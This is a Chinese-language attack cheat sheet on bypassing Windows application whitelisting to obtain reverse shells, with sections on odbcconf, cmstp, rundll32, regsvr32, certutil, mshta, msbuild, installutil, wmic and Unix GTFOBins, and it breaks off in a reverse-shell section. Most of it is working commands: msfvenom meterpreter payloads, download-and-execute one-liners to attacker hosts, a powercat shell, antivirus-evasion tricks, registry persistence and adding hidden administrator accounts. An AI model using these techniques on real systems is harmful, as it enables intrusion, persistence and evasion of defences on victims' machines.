msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse\_tcp LHOST= 192.168.43.231 LPORT=53 -e x86/shikata\_ga_nai -b '\\\x00\\\x0a\\\xff' -i 3 -f exe -o payload.exe
```
![windows下基于白名单获取shell的方法整理(下)](img/84c115a3f22e43e49cc9b108e7dee7be)
靶机执行(payload传到靶机上)
```
echo !C:\\payload.exe > o &&echo quit >> o &Ftp ‐n ‐s:o &&del /F /Q o
```
![windows下基于白名单获取shell的方法整理(下)](img/042bd6f0a9954246a3fdc9b6ee52003a)
## ODBCCONF利用dll
ODBCCONF.exe是一个命令行工具,允许配置ODBC驱动程序和数据
说明:Odbcconf.exe所在路径已被系统添加PATH环境变量中,因此,Odbcconf命令可识
别,需注意x86,x64位的Odbcconf调用。
Windows 2003 默认位置:
C:\WINDOWS\system32\odbcconf.exe
C:\WINDOWS\SysWOW64\odbcconf.exe
Windows 7 默认位置:
C:\Windows\System32\odbcconf.exe
C:\Windows\SysWOW64\odbcconf.exe
msf启用监听
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.43.231
msf exploit(multi/handler) > set AutoRunScript migrate -f
msf exploit(multi/handler) > set lport 53
msf exploit(multi/handler) > exploit
```
生成dll
```
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 92.168.43.231 LPORT=53 -f dll -o payload.dll
```
![windows下基于白名单获取shell的方法整理(下)](img/bdb5e9edd33d46a6a836ddd745b74eb1)
靶机执行以下代码(注意payload版本)
```
odbcconf.exe /a {regsvr C:\\payload.dll}
```
![windows下基于白名单获取shell的方法整理(下)](img/642120c5e5a247c2ae577528163ba5b7)
## cmstp利用dll
Cmstp安装或删除“连接管理器”服务配置文件。如果不含可选参数的情况下使用,则
cmstp 会使用对应于操作系统和用户的权限的默认设置来安装服务配置文件。
说明:Cmstp.exe所在路径已被系统添加PATH环境变量中,因此,Cmstp命令可识别,需
注意x86,x64位的Cmstp调用。
Windows 2003 默认位置:
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
Windows 7 默认位置:
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
msf启用监听
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.43.231
msf exploit(multi/handler) > set AutoRunScript migrate -f
msf exploit(multi/handler) > set lport 53
msf exploit(multi/handler) > exploit
```
准备inf文件,以下是模板
```
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\payload.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="safe6"
ShortSvcName="safe6"
```
INF 文件的 RegisterOCXSection 需要包含恶意 DLL 文件的本地路径或远程执行的 WebDAV 位置
然后再靶机执行以下命令
```
cmstp /s safe6.inf
```
![windows下基于白名单获取shell的方法整理(下)](img/3085efce68554bb1a68a554107a74231)
## Rundll
Rundll32.exe与Windows操作系统相关联,Rundll32.exe可调用从DLL导出的函数(16位或32位)并将其存储在特定的内存库中。
通过SMB交付Metasploit发起Rundll32攻击
Metasploit包含“ SMB Delivery”模块,该模块生成恶意的dll文件。 该模块通过SMB服务器提供有效负载,并提供控制命令。 当前支持DLL和Powershell。
```
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit
```
下面通过Rundll32.exe命令获得meterpreter会话。
![windows下基于白名单获取shell的方法整理(上)](img/c125051f16bc49c29da567e9dc6cf96d)
在受控机器上远程执行恶意dll,你将获得受控计算机的反向shell。
```
rundll32.exe \\\192.168.1.109\\vabFG\\test.dll,0
```
![windows下基于白名单获取shell的方法整理(上)](img/a1e6033798d64d1c9e098e5e4416d5b8)
获得meterpreter会话如下:
![windows下基于白名单获取shell的方法整理(上)](img/63e9268f2dbf4a9c867b7682a1a21054)
## Regsvr32
Regsvr32.exe是一个命令行程序,用于注册和注销OLE控件,例如Windows注册表中的DLL和ActiveX控件。Regsvr32.exe安装在Windows XP和Windows更高版本的%systemroot%\ System32文件夹下。
```
RegSvr32.exe具有以下命令行选项:
语法:Regsvr32 [/s] [/ u] \[/ n] \[/ i [:cmdline\]\]<dllname>
/ u –注销服务器
/ i –调用DllInstall,并为其传递可选的\[cmdline\]; 与/ u一起使用时,它将调用dll进行卸载
/ n –不调用DllRegisterServer;此选项必须与
/ i一起使用
/ s –静音;不显示消息框
```
通过Metasploit的脚本Web交付启动Regsvr32
此模块可快速启动提供有效负载的Web服务器。提供的命令将允许有效负载下载并执行。它将通过regsvr32.exe来指定脚本语言解释器或“ squibledoo”来绕过应用程序白名单。该模块的主要目的是在目标计算机上快速建立会话。
Regsvr32使用squiblydoo技术绕过应用程序白名单。签名的Microsoft二进制文件Regsvr32能够运行.sct文件,然后在其中执行包含PowerShell命令。两个Web请求(即.sct文件和PowerShell下载/执行)都可以在同一端口上执行。“PSH(Binary)”会将文件写入到硬盘中,允许自定义二进制文件被下载和执行。
```
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payloadphp/meterpreter/reverse\_tcp
msf exploit (web_delivery)> set lhost192.168.1.109
msf exploit (web_delivery)>set srvhost192.168.1.109
msf exploit (web_delivery)>exploit
```
复制下图中突出被框选的代码:
![windows下基于白名单获取shell的方法整理(上)](img/35a542b7767642698a91f0b507344fef)
一旦该exploit被执行,您将拥有一个为您创建的URL。在受害者pc的命令提示符中运行该URL,如下所示:
![windows下基于白名单获取shell的方法整理(上)](img/3680facddad648698153a8741e3ec61a)
在命令执行后按Enter键,您将拥有您的会话。如下图所示,输入sysinfo命令获取主机信息:
![windows下基于白名单获取shell的方法整理(上)](img/9cc5141d0bdf45faab6a059adfcde5b0)
## vbs
vbs downloader,使用msxml2.xmlhttp和adodb.stream对象
```vbscript
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://192.168.1.1/1.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "C:\test\1.exe",2
```
## powershell
**下载**
```powershell
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe'
```
```
(New-Object Net.WebClient).DownloadString("http://xx.xx.xx.xx /test.ps1")
```
**下载执行**
```
Invoke-Expression (New-Object Net.WebClient).DownloadString("http://xxx.xx.xx.xx/test.ps1")
```
**下载bypass**
但是可以通过来进行绕过:
但是要注意,如果目标目录为桌面或者system32,360仍然会产生提醒,但是文件仍然会下载下来,且可以正常执行:
```
echo (new-object System.Net.WebClient).DownloadFile('http://192.168.31.93:8000/tomcat.exe','C:/Users/test/cc.exe')| powershell -
```
**Powercat攻击**
PowerCat是一个的powershell写的TCP / IP瑞士军刀,看一看成NCAT的的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,SMB协议支持,中继模式,生成有效载荷,端口扫描等等。
```
git clone https://github.com/besimorhino/powercat.git
cd powercat
python -m SimpleHTTPServer 80
```
![windows下基于白名单获取shell的方法整理(上)](img/c0da3e7d583f4b61a00d75a2072a9294)
然后在远程端执行下面的命令获得netcat会话。
```
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1');powercat -c 192.168.1.109 -p 1234 -e cmd"
```
![windows下基于白名单获取shell的方法整理(上)](img/2346fb6ca38d4898a81b1920e37ced11)
正如你观察到的,我们已经获得了目标机器的netcat会话。
![windows下基于白名单获取shell的方法整理(上)](img/1b17381a87d049dfa1316a123a0f702e)
**批处理文件攻击(powerShell脚本)**
同样,PowerShell 允许客户端执行批处理文件,因此让我们使用 msfvenom 生成恶意批处理文件,如下所示,然后启动 netcat 侦听器。
```
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat
```
![windows下基于白名单获取shell的方法整理(上)](img/020d23c3d0324d088d30821178f4e640)
然后执行以下命令以获取 netcat 会话。
```
powershell -c "IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))
```
![windows下基于白名单获取shell的方法整理(上)](img/d1c671b0e70443678e5403d6ed722cbe)
如下,我们已经获得了目标机器的netcat会话。
![windows下基于白名单获取shell的方法整理(上)](img/ca544b7a5a5d4d66b1929fac914070a4)
**利用cscript.exe攻击**
同样,PowerShell 允许客户端执行cscript.exe 运行 wsf、js 和vbscript文件。因此,让我们生成具有 msfvenom 的恶意bat文件,如下所示,并作为侦听器启动multi/handler程序。
```
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs >1.vbs
```
![windows下基于白名单获取shell的方法整理(上)](img/f4f61e9a66774ed49a489cf3bf851d48)
在目标机器上执行下面的命令行获得meterpreter会话。
```
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\\"$env:temp\\test.vbs\\");Start-Process %windir%\\system32\\cscript.exe \\"$env:temp\\test.vbs\\""
```
![windows下基于白名单获取shell的方法整理(上)](img/9e4a9da381c94e66b406bacda546729d)
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
```
获得meterpreter会话如下:
![windows下基于白名单获取shell的方法整理(上)](img/1c36d896178b4ff49c690fa0bfdb43f1)
## certutil
Certutil.exe是作为证书服务的一部分安装的命令行程序。
**下载姿势**
保存在当前路径,文件名称同URL
```bash
certutil.exe -urlcache -split -f http://192.168.1.1/1.exe
```
保存在当前路径,指定保存文件名称
```bash
certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.php
```
隐藏在ADS数据流中:
```
certutil.exe -urlcache -split -f https://xx.xx.xx.xx/xx c:\\temp:ttt
```
使用downloader默认在缓存目录位置: `%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content`保存下载的文件副本
命令行删除缓存
```bash
certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete
```
查看缓存项目:
```
certutil.exe -urlcache *
```
转为base64
```
certutil -encode lcx64.exe lcx64.txt
```
转回来
```
certutil -decode lcx64.txt lcx64.exe
```
查看md5
```
certutil -hashfile a.exe MD5
```
**姿势学习**
https://y4er.com/post/certutil-powershell-write-file/ 极限环境Certutil加Powershell配合Burp快速落地文件
**bypass**
https://mp.weixin.qq.com/s/LGe3SuCGiNMHNbfN6oTApw 记一次渗透测试后引发的小扩展
直接下载会被拦截用&和|也可以顺利绕过并下载
```
Certutil & Certutil –urlcache –f –split url
Certutil | Certutil –urlcache –f –split url
```
![img](img/640)
经过后续的测试发现也可以先执行一次certutil再执行原始的下载语句即可绕过,便可以看到2.exe已经被下载。
![img](img/640)
其实想想使用的符号&和|,本质都是执行了2次certutil~
**msf攻击**
通过msfvenom 生成恶意可执行文件,并使用start multi/handler 获取目标计算机反向shell会话。
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe
```
再用python生成一个简易的http服务器
![windows下基于白名单获取shell的方法整理(上)](img/be5df3d4110c40e0bd188984c168ff21)
现在,为了使用certutil.exe能够获取配置信息和可执行文件,我们需要使用如下语法:
语法:[-f] [-urlcache] [-split]可执行文件路径
```
certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe
```
![windows下基于白名单获取shell的方法整理(上)](img/bd28c7d78d564527856de8a733a2d034)
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
```
这样,我们获得了目标计算机的反向shell。如下所示:
![windows下基于白名单获取shell的方法整理(上)](img/681a4b15639b4cdeb1195c4dd1ba529b)
## csc
csc.exe是微软.NET Framework 中的C#编译器,Windows系统中默认包含,可在命令行下将cs文件编译成exe
download.cs
```c#
using System.Net;
namespace downloader
{
class Program
{
static void Main(string[] args)
{
WebClient client = new WebClient();
string URLAddress = @"http://192.168.1.1/1.exe";
string receivePath = @"C:\test\";
client.DownloadFile(URLAddress, receivePath + System.IO.Path.GetFileName
(URLAddress));
}
}
}
```
```bash
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:C:\tes
t\download.exe C:\test\download.cs
```
## Desktopimgdownldr
参考:https://www.anquanke.com/post/id/223232#h2-3 新型下载LOLBIN
用于设置锁定屏幕或桌面背景图像作为个性化CSP一部分.CSP在WIN10 1703之后引入
用户如果没有用过CSP,那么路径不存在。
```
C:\Windows\Personalization
```
默认图片下载和存放路径:
```
C:\windows\Personalization\LockScreenImage\LockScreenImage_%random%.jpg
```
Desktopimgdownldr默认用法:
```
desktopimgdownldr /lockscreenurl:https://domain.com:8080/file.exe /
eventName:randomname
```
用法
管理员运行,该文件会设置并覆盖用户锁定的屏幕图像,并生成注册表,我们需要将其注册表删除,避免将其屏幕覆盖
```cmd
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe
/lockscreenurl: https://xx.xx.xx.xx/xxx.ps1 && reg delete
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP
/f
```
注册表路径:
```
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP
```
由于二进制文件desktopimgdownldr中的FunctionSHExpandEnvironmentStringsW使用硬编码地址,所以非管理员也能使用,而且无需注册表。
```
%systemroot%\Personalization\LockScreenImage
```
普通用户运行:
```
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe
/lockscreenurl: https://xx.xx.xx.xx/xxx.ps1 /eventName:desktopimgdownldr
```
管理员执行成功了。同时生成了注册表。
```
C:\Windows\system32>desktopimgdownldr
/lockscreenurl:http://xx.xxx.xx.xx/test.ps1 /eventName:randomname
```
[![img](img/t01aec2b6bc79f41db9.png)](https://p0.ssl.qhimg.com/t01aec2b6bc79f41db9.png)
[![img](img/t01c3e6c9239eb8cbf8.png)](https://p3.ssl.qhimg.com/t01c3e6c9239eb8cbf8.png)
我的机器环境使用了COM +注册目录。因为修改了%systemroot%目录导致文件找不到它。
```
mklink /J "%TEMP%\Registration" C:\windows\Registration && set
"SYSTEMROOT=%TEMP%" && cmd /c desktopimgdownldr.exe
/lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr &
rmdir /s /q "%TEMP%\Registration"
```
重新建立软连接后可以在普通用户下成功运行。
[![img](img/t01b708845cf66cd01d.png)](https://p4.ssl.qhimg.com/t01b708845cf66cd01d.png)
## CertReq
ertreq命令可用于从证书颁发机构(CA)请求证书,从CA检索对先前请求的响应,从.inf文件创建新请求,接受并安装对请求的响应,根据现有的CA证书或请求构造交叉认证或合格的从属请求,并签署交叉认证或合格的从属请求。 原本用于帮助windows进行证书认证。还能够作为上传,下载的重要工具。
用法
上传请求:
```
CertReq -Post -config https://example.org/ c:\windows\win.ini
```
下载POST请求,并显示内容(支持HTTP与HTTPS):
```
CertReq -Post -config https://example.org/ c:\windows\win.ini
```
下载POST请求,并保存到本地(支持HTTP与HTTPS):
```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
Debug
个人测试的时候小文件是可以直接下载,估计50多kb左右,大文件会报错。
小文件:
[![img](img/t0179f4650d065eae52.png)](https://p5.ssl.qhimg.com/t0179f4650d065eae52.png)
大文件:
[![img](img/t01b1b14df688454ae5.png)](https://p3.ssl.qhimg.com/t01b1b14df688454ae5.png)
## Unix-GTFOBins
windows有LOLbins,Unix下当然也有。
### **whois**
whois用法
攻击机器监听
```
nc -l -p 12345 < "file_to_send"
```
靶机
```
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE"
```
[![img](img/t0112d44980cbec3f22.png)](https://p2.ssl.qhimg.com/t0112d44980cbec3f22.png)
同理也能传递二进制文件,进行base64位编码。
```
base64 "file_to_send" | nc -l -p 12345
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
```
### PIP
PIP用法
利用php install来下载文件。
```
export URL=http://attacker.com/file_to_get
export LFILE=/tmp/file_to_save
TF=$(mktemp -d)
echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])' > $TF/setup.py
pip install $TF
```
[![img](img/t011eb86eb5f0821b1c.png)](https://p4.ssl.qhimg.com/t011eb86eb5f0821b1c.png)
[![img](img/t0130f58e0dd124e805.png)](https://p0.ssl.qhimg.com/t0130f58e0dd124e805.png)
## Msiexec
Windows 操作系统附带了一个 Windows 安装程序引擎,该引擎由 MSI 程序包用于应用程序的安装。解释包和安装产品的可执行程序就是 Msiexec.exe。
通过msfvenom发起msiexec攻击
让我们利用MeterpreterWindows攻击载荷生成 MSI 包文件(1.msi)如下所示,并作为侦听器启动multi/handler程序进行监听。
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109lport=1234 -f msi > 1.msi
```
![windows下基于白名单获取shell的方法整理(上)](img/72bc56bfebf64e4ba172e338aa3ed553)
在msiexec 的帮助下,一旦您在远程计算机上执行 1.msi 文件,你会得到反向连接在您的本地计算机(Kali Linux).
```
msiexec /q /i http://192.168.1.109/1.msi
```
![windows下基于白名单获取shell的方法整理(上)](img/f2796f1fb34749669bf9226c50adb17f)
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
```
获得meterpreter会话如下:
![windows下基于白名单获取shell的方法整理(上)](img/5e9ff6a3206a451ea89e71974f72f1d2)
## MSBuild
意思就是msbuild可以编译执行csharp代码。
在这里我们需要知道的是msbuild的路径
加载32位的shellcode需要用32位的msbuild
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
```
加载64位的shellcode需要用64位的msbuild
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
```
我们这里用64位的shellcode和64位的win7来操作。
```
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp
```
生成shellcode之后我们需要用到一个三好学生师傅的https://github.com/3gstudent/msbuild-inline-task
我们用的是`executes x64 shellcode.xml`的模板,把里面45行之后的改为自己的shellcode
然后msf监听
```
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.1.130
set LPORT 4444
set ExitOnSession false
set autorunscript migrate -n explorer.exe
exploit -j
```
在目标机器上运行
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319>MSBuild.exe "C:\Users\jack.0DAY\Desktop\exec.xml"
```
然后会话上线,某数字卫士无反应,并且正常执行命令
[![img](img/20190722175301-7de41cd8-ac66-1.png)](https://xzfile.aliyuncs.com/media/upload/picture/20190722175301-7de41cd8-ac66-1.png)
更多关于msbuild的内容可以参考[三好学生师傅的文章](https://3gstudent.github.io/3gstudent.github.io/Use-MSBuild-To-Do-More/)
## Wmic
WMIC .exe是一个 Microsoft 工具,它提供了一个 WMI命令行界面,用于本地和远程计算机的各种管理功能,还用于在本地或远程执行系统设置、停止进程和执行脚本等查询。因此,它可以调用 XSL 脚本(可增强样式表语言)。
通过Koadic发起Wmic.exe攻击
koadic是一个命令控制(C2)工具,类似Metasploit和Powershell Empire。使用koadic我们生成恶意XSL文件。koadic安装完成后,您可以运行./koadic 文件以启动 koadic,然后通过运行以下命令开始加载stager/js/wmic 程序,并将 SRVHOST 设置为程序回连IP。
```
use stager/js/wmic
set SRVHOST 192.168.1.107
run
```
![windows下基于白名单获取shell的方法整理(上)](img/ea51968f293941acb8776c2e1e638c89)
执行 WMIC 以下命令,从远程服务器下载和运行恶意 XSL 文件:
```
wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"
```
![windows下基于白名单获取shell的方法整理(上)](img/741d9a8fc6714d9c9b8be1bb33d77b8d)
一旦恶意的XSL文件在目标计算机上执行,你将有一个僵尸连接,就像Metasploit回连的情况一样。
![windows下基于白名单获取shell的方法整理(上)](img/10a0fd7fff40479888ff8c0c4828d3c1)
模板
```xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>
```
参考:[利用wmic调用xsl文件的分析与利用](https://3gstudent.github.io/利用wmic调用xsl文件的分析与利用/)
这里还有一个poc https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl
**绑定程序运行**
当test.exe运行时,cmd.exe也将运行
```
wmic.exe process call create "C:\\Windows\\system32\\reg.exe add
\\\\"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File
Execution
Options\\test.exe\\" /v \\"Debugger\\" /t REG_SZ /d \\"cmd.exe\\"/
f"
```
**bypass**
摘自https://mp.weixin.qq.com/s/LGe3SuCGiNMHNbfN6oTApw
在后续的测试变形中发现先执行wmic os,然后执行正常的命令即可绕过,如下所示:
![sffdfdfgedgewrg](img/sffdfdfgedgewrg.png)
![dgdsfgergeqgbsadf6565](img/dgdsfgergeqgbsadf6565.png)
对于wmic的绕过也可以先执行wmic然后exit退出,然后继续执行原始的下载命令即可,当然wmic也有其他方式可以进行绕过这里不展开介绍。
**小扩展**
下面介绍一个小的利用方式添加用户,其余白名单执行和利用方式可以自行研究~。这种调用的方式最早应该是由Casey Smith@subTee大佬分享一个技巧,利用wmic从本地或者远程调用xsl的方式来执行携带有payload的xsl文件。
首先执行wmic os。
![img](img/8422d858480943cc834687a814db2734)
然后再次执行wmic os get下载命令即可成功添加,此时未有拦截,如下所示:
![img](img/46de3ddbab0041f69d456b787e45d843)
![img](img/41916aabe2a247d9bf9b3088aca7a3b5)
当然,添加用户到到管理员组需要管理员权限,所以我在这里用了本地的管理员进行的执行,脚本主要是调用了windows的2个api函数进行创建用户和添加管理员组,分别为:
```
NetUserAdd //添加用户
NetLocalGroupAddMembers //添加用户到管理员
```
可能有人会问到xsl文件怎么执行的添加用户到管理员,因为这个整个流程是先将添加用户的c#脚本先转化为dll文件,然后使用DotNetToJScript将该dll文件转为为js,最后将转化为的js文件放在要落地执行的xsl文件里面。对于c#语言或者c++语言调用windows api添加用户至管理员组网上已经有很多代码,拿过来改改就行。然后使用Visual Studio的开发者工具将c#文件转化为dll文件。
语法:csc /target:library /out:输出文件 待转化的c#文件
![img](img/56c9e84d69514466a1d4f90c06878606)
然后使用DotNetToJScript将文件转化为js脚本文件(DotNetToJScript这个工具是由17年James Forshaw开源了一个工具DotNetToJScript,能够利用JS、Vbs等脚本加载.Net程序。)转化语法也比较简单。如下所示:
![img](img/7680a6406ce945878557307d43fdb437)
可以看出直接DotNetToJScript –o 待输出js文件 待转化文件。(但是该工具不能够绕过windwos 的amsi检测机制,如果要想绕过该防护可以使用另外一个工具GadgetToJScript(https://github.com/med0x2e/GadgetToJScript)
来看下DotNetToJScript工具转化后的js文件如下图所示:
![img](img/04a9eff02197467e824394a4d7d169d6)
![img](img/37cae14710a144f183fe1e19839f47e9)
处理流程大概是就是js通过调用一些windwos api的函数来对前面base64编码过后的代码进行解码,然后解码过后进行反序列化操作,因为工具是先序列化然后再base64编码。最后把文件写入xsl文件定义为Jscript语言,借助.net环境来实现代码功能。绕过之后貌似不再拦截原始的下载命令,但是需要退出该杀软才可以再次拦截原始的certutil或者wmic命令,(有的时候即使退出再重新开启也不会拦截)即使再次进入拦截,通过上述方法继续可以执行下载。
对于调用windows api绕过部分杀软添加管理员也是老生常谈了,也可以修改为接收参数的方式进行,把写好的文件编译为exe即可使用,相信聪明的你应该知道怎么做了~~~
![img](img/0d5a1e660be44476aec2b1310a686678)
绕过并添加到管理员组:
![img](img/896fa4144e8a45979563fe31cbbb79cf)
![img](img/528ec065d3964c8f8671221cd0e00a56)
## hta
Mshta.exe运行微软HTML应用程序主机,微软HTML应用程序主机是Windows应用用程序,负责运行HTA(HTML应用程序)文件。我们通运行HTML文件执行JavaScript和VBScript脚本。Mshta.exe可以解释这种文件。
**下载姿势**
添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序
将以下代码保存为hta文件
```html
<html>
<head>
<script>
var Object = new ActiveXObject("MSXML2.XMLHTTP");
Object.open("GET","http://192.168.1.1/1.exe",false);
Object.send();
if (Object.Status == 200)
{
var Stream = new ActiveXObject("ADODB.Stream");
Stream.Open();
Stream.Type = 1;
Stream.Write(Object.ResponseBody);
Stream.SaveToFile("C:\\test\\1.exe", 2);
Stream.Close();
}
window.close();
</script>
<HTA:APPLICATION
WINDOWSTATE = "minimize">
</head>
<body>
</body>
</html>
```
**利用msf攻击**
Metasploit 包含生成恶意HTA文件的“HTA WebServer”模块,恶意文件通过Powershell运行有效负载。当用户导航到HTA文件时,将在执行有效负载之前由IE两次提示它们。
用户导航到HTA文件时,将在执行有效负载之前由IE两次提示它们。
```
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) >set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) >set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) >exploit
```
现在可以在受害者机器上执行mshta.exe恶意代码获得meterpreter会话
![windows下基于白名单获取shell的方法整理(上)](img/8abbc72e7a0c4c629062ea6fc8e7ed31)
在受害者机器上通过mshta.exe访问恶意hta远程文件,你就可以在本机获得shell。
```
mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta
```
![windows下基于白名单获取shell的方法整理(上)](img/5de872b6fc5843fcb8efc60420f09a23)
获得受害主机shell:
![windows下基于白名单获取shell的方法整理(上)](img/25479c224e12401097ef4646f52b14c1)
## bitsadmin
bitsadmin是一个命令行工具,可用于创建下载或上传工作和监测其进展情况。xp以后的Windows系统自带
```bash
bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe
```
**不支持https、ftp协议,php python带的服务器会出错**
## Installutil
Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来
安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用
说明:Installutil.exe所在路径没有被系统添加PATH环境变量中,因此,Installutil命令无法
识别。
**相关工具**
https://github.com/khr0x40sh/WhiteListEvasion
**msf攻击**
可以用来bypass
```
exploit/windows/local/applocker_bypass
```
### Installutil&csc配合使用
通过msfvenom生成C#的shellcode
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp
```
下载InstallUtil-Shellcode.cs,将上面生成的shellcode复制到该cs文件中
https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260
csc编译InstallUtil-ShellCode.cs
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs
```
编译生成的文件后缀名无所谓exe dll txt都可以,但只能InstallUtil.exe来触发
InstallUtil.exe执行 反弹shell
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U D:\test\InstallUtil-shell.exe
```
参考https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/
## regasm和regsvcs
regasm和regsvcs都可以用来反弹shell的,而且方式也一样
[下载这个cs文件](https://github.com/3gstudent/Bypass-McAfee-Application-Control--Code-Execution/blob/master/regsvcs.cs) ,然后替换你的shellcode
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -f csharp
```
使用sn.exe生成公钥和私钥,如果没有sn命令你可能需要安装vs
```
sn -k key.snk
```
编译dll,注意文件的路径
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs
```
用这两者上线
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe 1.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe 1.dll
```
或者这样
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U 1.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U 1.dll
```
上线成功。
## uuid
文章https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
红队技巧-利用uuid加载shellcode
文章https://mp.weixin.qq.com/s/1DvYNDiZc2iV1pXEn7GZEA
# 免杀
系列推荐:https://github.com/TideSec/BypassAntiVirus
## payload分离免杀
### 免杀loader(20210220)
https://github.com/knownsec/shellcodeloader
https://github.com/1y0n/AV_Evasion_Tool
https://github.com/lengjibo/FourEye
### shellcode loader
借助第三方加载器,将shellcode加载到内存中来执行。
https://github.com/clinicallyinane/shellcode_launcher
```
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.1.130 lport=4444 -e x86/shikata_ga_nai -i 5 -f raw > test.c
```
靶机执行
```
shellcode_launcher.exe -i test.c
```
msf监听正常上线
# 反弹shell
## 监听
**nc**
```bash
nc -lvvp 4444
```
## bash
```bash
